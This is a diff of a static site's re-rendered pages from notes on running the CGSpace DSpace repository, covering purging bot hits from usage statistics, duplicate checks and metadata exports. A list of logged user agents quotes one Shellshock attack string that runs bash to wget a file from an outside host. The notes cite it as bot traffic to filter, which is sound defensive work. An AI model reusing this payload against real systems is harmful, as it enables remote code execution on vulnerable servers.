<li>Crowsnest/0.5 (+http://www.crowsnest.tv/)</li>
<li>Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com</li>
<li>metha/0.2.27</li>
<li>ZaloPC-win32-24v454</li>
<li>Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x</li>
<li>ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org)</li>
<li>FullStoryBot/1.0 (+https://www.fullstory.com)</li>
<li>Link Validity Check From: <a href="http://www.usgs.gov">http://www.usgs.gov</a></li>
<li>OSPScraper (+https://www.opensyllabusproject.org)</li>
<li>() { :;}; /bin/bash -c &quot;wget -O /tmp/bbb <a href="http://www.redel.net.br/1.php?id=3137382e37392e3138372e313832">www.redel.net.br/1.php?id=3137382e37392e3138372e313832</a>&quot;</li>
</ul>
</li>
<li>I submitted <a href="https://github.com/atmire/COUNTER-Robots/pull/52">a pull request to COUNTER-Robots</a> with some of these</li>
</ul>
</li>
<li>I purged a bunch of hits from the stats using the <code>check-spider-hits.sh</code> script:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>]$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
</span></span><span style="display:flex;"><span>Purging 6 hits from scalaj-http in statistics
</span></span><span style="display:flex;"><span>Purging 5 hits from lua-resty-http in statistics
</span></span><span style="display:flex;"><span>Purging 9 hits from AHC in statistics
</span></span><span style="display:flex;"><span>Purging 7 hits from acebookexternalhit in statistics
</span></span><span style="display:flex;"><span>Purging 1011 hits from axios\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 2216 hits from Faveeo\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 1164 hits from Moreover\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 740 hits from Exploratodo\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 585 hits from GroupHigh\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 438 hits from Crowsnest\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 1326 hits from nbertaupete95 in statistics
</span></span><span style="display:flex;"><span>Purging 182 hits from metha\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 68 hits from ZaloPC-win32-24v454 in statistics
</span></span><span style="display:flex;"><span>Purging 1644 hits from Firefox\/x\.x in statistics
</span></span><span style="display:flex;"><span>Purging 678 hits from ZoteroTranslationServer in statistics
</span></span><span style="display:flex;"><span>Purging 27 hits from FullStoryBot in statistics
</span></span><span style="display:flex;"><span>Purging 26 hits from Link Validity Check in statistics
</span></span><span style="display:flex;"><span>Purging 26 hits from OSPScraper in statistics
</span></span><span style="display:flex;"><span>Purging 1 hits from 3137382e37392e3138372e313832 in statistics
</span></span><span style="display:flex;"><span>Purging 2755 hits from Nutch-[0-9] in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 12914
</span></span></code></pre></div><ul>
<li>I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project</li>
</ul>
<!-- raw HTML omitted -->

View File

@ -17,7 +17,7 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="404 Page not found"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Categories"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -94,11 +94,11 @@
<ul>
<li>Send Gaia the last batch of potential duplicates for items 701 to 980:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv
</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
</span></span></code></pre></div>
<a href='https://alanorth.github.io/cgspace-notes/2022-03/'>Read more →</a>
</article>
@ -170,13 +170,13 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
<li>Atmire merged some changes I had submitted to the COUNTER-Robots project</li>
<li>I updated our local spider user agents and then re-ran the list with my <code>check-spider-hits.sh</code> script on CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-hits.sh -f /tmp/agents -p
Purging 1989 hits from The Knowledge AI in statistics
Purging 1235 hits from MaCoCu in statistics
Purging 455 hits from WhatsApp in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679
</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/agents -p
</span></span><span style="display:flex;"><span>Purging 1989 hits from The Knowledge AI in statistics
</span></span><span style="display:flex;"><span>Purging 1235 hits from MaCoCu in statistics
</span></span><span style="display:flex;"><span>Purging 455 hits from WhatsApp in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679
</span></span></code></pre></div>
<a href='https://alanorth.github.io/cgspace-notes/2021-12/'>Read more →</a>
</article>
@ -199,9 +199,9 @@ Purging 455 hits from WhatsApp in statistics
<li>I experimented with manually sharding the Solr statistics on DSpace Test</li>
<li>First I exported all the 2019 stats from CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid
$ zstd statistics-2019.json
</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid
</span></span><span style="display:flex;"><span>$ zstd statistics-2019.json
</span></span></code></pre></div>
<a href='https://alanorth.github.io/cgspace-notes/2021-11/'>Read more →</a>
</article>
@ -223,15 +223,15 @@ $ zstd statistics-2019.json
<ul>
<li>Export all affiliations on CGSpace and run them against the latest RoR data dump:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt
$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
ations-matching.csv
$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l
1879
$ wc -l /tmp/2021-10-01-affiliations.txt
7100 /tmp/2021-10-01-affiliations.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt
</span></span><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
</span></span><span style="display:flex;"><span>ations-matching.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l
</span></span><span style="display:flex;"><span>1879
</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-10-01-affiliations.txt
</span></span><span style="display:flex;"><span>7100 /tmp/2021-10-01-affiliations.txt
</span></span></code></pre></div><ul>
<li>So we have 1879/7100 (26.46%) matching already</li>
</ul>
<a href='https://alanorth.github.io/cgspace-notes/2021-10/'>Read more →</a>
@ -288,8 +288,8 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
<ul>
<li>Update Docker images on AReS server (linode20) and reboot the server:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
</span></span></code></pre></div><ul>
<li>I decided to upgrade linode20 from Ubuntu 18.04 to 20.04</li>
</ul>
<a href='https://alanorth.github.io/cgspace-notes/2021-08/'>Read more →</a>
@ -313,9 +313,9 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
<ul>
<li>Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
COPY 20994
</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 20994
</span></span></code></pre></div>
<a href='https://alanorth.github.io/cgspace-notes/2021-07/'>Read more →</a>
</article>

View File

@ -17,11 +17,11 @@
&lt;ul&gt;
&lt;li&gt;Send Gaia the last batch of potential duplicates for items 701 to 980:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &amp;gt; /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;fuuu&amp;#39;&lt;/span&gt; -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &amp;gt; /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &amp;gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &amp;gt; /tmp/tac4.csv
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;fuuu&amp;#39;&lt;/span&gt; -o /tmp/2022-03-01-tac-batch4-701-980.csv
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &amp;gt; /tmp/tac4-filenames.csv
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &amp;gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
</item>
<item>
@ -66,13 +66,13 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
&lt;li&gt;Atmire merged some changes I had submitted to the COUNTER-Robots project&lt;/li&gt;
&lt;li&gt;I updated our local spider user agents and then re-ran the list with my &lt;code&gt;check-spider-hits.sh&lt;/code&gt; script on CGSpace:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;$ ./ilri/check-spider-hits.sh -f /tmp/agents -p
Purging 1989 hits from The Knowledge AI in statistics
Purging 1235 hits from MaCoCu in statistics
Purging 455 hits from WhatsApp in statistics
&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;
&lt;/span&gt;&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;&lt;/span&gt;Total number of bot hits purged: 3679
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./ilri/check-spider-hits.sh -f /tmp/agents -p
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Purging 1989 hits from The Knowledge AI in statistics
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Purging 1235 hits from MaCoCu in statistics
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Purging 455 hits from WhatsApp in statistics
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;&lt;/span&gt;Total number of bot hits purged: 3679
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
</item>
<item>
@ -86,9 +86,9 @@ Purging 455 hits from WhatsApp in statistics
&lt;li&gt;I experimented with manually sharding the Solr statistics on DSpace Test&lt;/li&gt;
&lt;li&gt;First I exported all the 2019 stats from CGSpace:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;$ ./run.sh -s http://localhost:8081/solr/statistics -f &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;time:2019-*&amp;#39;&lt;/span&gt; -a export -o statistics-2019.json -k uid
$ zstd statistics-2019.json
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./run.sh -s http://localhost:8081/solr/statistics -f &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;time:2019-*&amp;#39;&lt;/span&gt; -a export -o statistics-2019.json -k uid
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ zstd statistics-2019.json
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
</item>
<item>
@ -101,15 +101,15 @@ $ zstd statistics-2019.json
&lt;ul&gt;
&lt;li&gt;Export all affiliations on CGSpace and run them against the latest RoR data dump:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;localhost/dspace63= &amp;gt; \COPY (SELECT DISTINCT text_value as &amp;#34;cg.contributor.affiliation&amp;#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
$ csvcut -c &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; /tmp/2021-10-01-affiliations.csv | sed 1d &amp;gt; /tmp/2021-10-01-affiliations.txt
$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
ations-matching.csv
$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l
1879
$ wc -l /tmp/2021-10-01-affiliations.txt
7100 /tmp/2021-10-01-affiliations.txt
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;localhost/dspace63= &amp;gt; \COPY (SELECT DISTINCT text_value as &amp;#34;cg.contributor.affiliation&amp;#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvcut -c &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; /tmp/2021-10-01-affiliations.csv | sed 1d &amp;gt; /tmp/2021-10-01-affiliations.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;ations-matching.csv
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;1879
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ wc -l /tmp/2021-10-01-affiliations.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;7100 /tmp/2021-10-01-affiliations.txt
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;So we have 1879/7100 (26.46%) matching already&lt;/li&gt;
&lt;/ul&gt;</description>
</item>
@ -148,8 +148,8 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
&lt;ul&gt;
&lt;li&gt;Update Docker images on AReS server (linode20) and reboot the server:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;# docker images | grep -v ^REPO | sed &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;s/ \+/:/g&amp;#39;&lt;/span&gt; | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;# docker images | grep -v ^REPO | sed &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;s/ \+/:/g&amp;#39;&lt;/span&gt; | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;I decided to upgrade linode20 from Ubuntu 18.04 to 20.04&lt;/li&gt;
&lt;/ul&gt;</description>
</item>
@ -164,9 +164,9 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
&lt;ul&gt;
&lt;li&gt;Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;localhost/dspace63= &amp;gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
COPY 20994
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;localhost/dspace63= &amp;gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;COPY 20994
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
</item>
<item>
@ -271,17 +271,17 @@ COPY 20994
&lt;li&gt;I had a call with CodeObia to discuss the work on OpenRXV&lt;/li&gt;
&lt;li&gt;Check the results of the AReS harvesting from last night:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;$ curl -s &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;amp;pretty&amp;#39;&lt;/span&gt;
{
&amp;#34;count&amp;#34; : 100875,
&amp;#34;_shards&amp;#34; : {
&amp;#34;total&amp;#34; : 1,
&amp;#34;successful&amp;#34; : 1,
&amp;#34;skipped&amp;#34; : 0,
&amp;#34;failed&amp;#34; : 0
}
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
